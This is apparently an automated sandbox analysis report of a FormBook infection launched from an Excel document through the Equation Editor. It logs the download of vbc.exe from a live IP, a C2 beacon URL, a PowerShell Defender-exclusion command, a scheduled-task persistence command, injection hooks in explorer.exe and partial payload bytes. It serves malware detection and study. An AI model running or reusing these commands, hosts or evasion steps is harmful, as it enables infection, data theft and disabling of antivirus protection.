                                    Nov 25, 2021 19:29:21.899295092 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.899316072 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.901333094 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:21.907150030 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:21.907253981 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134200096 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134234905 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134258032 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134280920 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134322882 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134327888 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134349108 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134368896 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134372950 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134377003 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134397030 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134421110 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134424925 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134438038 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134457111 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134476900 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134478092 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134500980 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134512901 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134524107 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:22.134531975 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:22.134546995 CET8049165202.55.132.154192.168.2.22

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 25, 2021 19:30:53.426491022 CET5216753192.168.2.228.8.8.8
                                    Nov 25, 2021 19:30:53.621328115 CET53521678.8.8.8192.168.2.22

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Nov 25, 2021 19:30:53.426491022 CET192.168.2.228.8.8.80xc18cStandard query (0)www.metafirstclass.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Nov 25, 2021 19:30:53.621328115 CET8.8.8.8192.168.2.220xc18cNo error (0)www.metafirstclass.com52.128.23.153A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • 202.55.132.154
                                    • www.metafirstclass.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249165202.55.132.15480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    TimestampkBytes transferredDirectionData
                                    Nov 25, 2021 19:29:20.959091902 CET0OUTGET /384500000_1/vbc.exe HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 202.55.132.154
                                    Connection: Keep-Alive
                                    Nov 25, 2021 19:29:21.195264101 CET1INHTTP/1.1 200 OK
                                    Date: Thu, 25 Nov 2021 18:29:20 GMT
                                    Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                                    Last-Modified: Thu, 25 Nov 2021 04:42:24 GMT
                                    ETag: "b0a00-5d19599d2da5b"
                                    Accept-Ranges: bytes
                                    Content-Length: 723456
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdownload
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 14 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 0a 00 00 0a 00 00 00 00 00 00 7e 1d 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 1d 0b 00 4f 00 00 00 00 20 0b 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc fd 0a 00 00 20 00 00 00 fe 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 20 0b 00 00 08 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 08 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 1d 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b0 21 01 00 03 00 00 00 8c 01 00 06 5c 6a 02 00 d0 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0a0~ @ `@,O @ H.text `.rsrc @@.reloc@@B`HH!\js}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.224916752.128.23.15380C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Nov 25, 2021 19:30:53.961179972 CET760OUTGET /g2fg/?hZlpd=H/0ZmZGK5jsRiriaZut4CEFQpFY2p/TAFyTzOdFvzC4udK1/lSWrgm9fn/kzXoflvKU/jw==&LRgXx=fbcXTtnx6x HTTP/1.1
                                    Host: www.metafirstclass.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Nov 25, 2021 19:30:54.116276979 CET760INHTTP/1.1 463
                                    Server: nginx
                                    Date: Thu, 25 Nov 2021 18:30:54 GMT
                                    Content-Type: text/html
                                    Content-Length: 8915
                                    Connection: close
                                    ETag: "5e52d3ca-22d3"
                                    X-DIS-Request-ID: 9ab6992f058f33df87d2e92199f1ec19
                                    Set-Cookie: dis-remote-addr=84.17.52.63
                                    Set-Cookie: dis-timestamp=2021-11-25T10:30:54-08:00
                                    Set-Cookie: dis-request-id=9ab6992f058f33df87d2e92199f1ec19
                                    X-Frame-Options: sameorigin


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: USER32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEB
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEB
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEB
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEB

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:19:28:14
                                    Start date:25/11/2021
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f1a0000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:19:28:36
                                    Start date:25/11/2021
                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                    Imagebase:0x400000
                                    File size:543304 bytes
                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:19:28:41
                                    Start date:25/11/2021
                                    Path:C:\Users\Public\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\Public\vbc.exe"
                                    Imagebase:0x80000
                                    File size:723456 bytes
                                    MD5 hash:0F88779E9500075DE85E916637305164
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.473128964.00000000023E1000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.473159938.00000000023FF000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Antivirus matches:
                                    • Detection: 50%, ReversingLabs
                                    Reputation:low

                                    General

                                    Start time:19:28:43
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
                                    Imagebase:0x21f30000
                                    File size:452608 bytes
                                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    General

                                    Start time:19:28:44
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
                                    Imagebase:0x150000
                                    File size:179712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:19:28:45
                                    Start date:25/11/2021
                                    Path:C:\Users\Public\vbc.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\Public\vbc.exe
                                    Imagebase:0x80000
                                    File size:723456 bytes
                                    MD5 hash:0F88779E9500075DE85E916637305164
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.471438576.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506321785.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.471899912.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:19:28:50
                                    Start date:25/11/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0xffa10000
                                    File size:3229696 bytes
                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.489472241.00000000092FB000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:19:29:01
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe
                                    Imagebase:0xd80000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665478819.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665720602.0000000000730000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.665582467.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    General

                                    Start time:19:29:07
                                    Start date:25/11/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\Public\vbc.exe"
                                    Imagebase:0x49dc0000
                                    File size:302592 bytes
                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                    Reset < >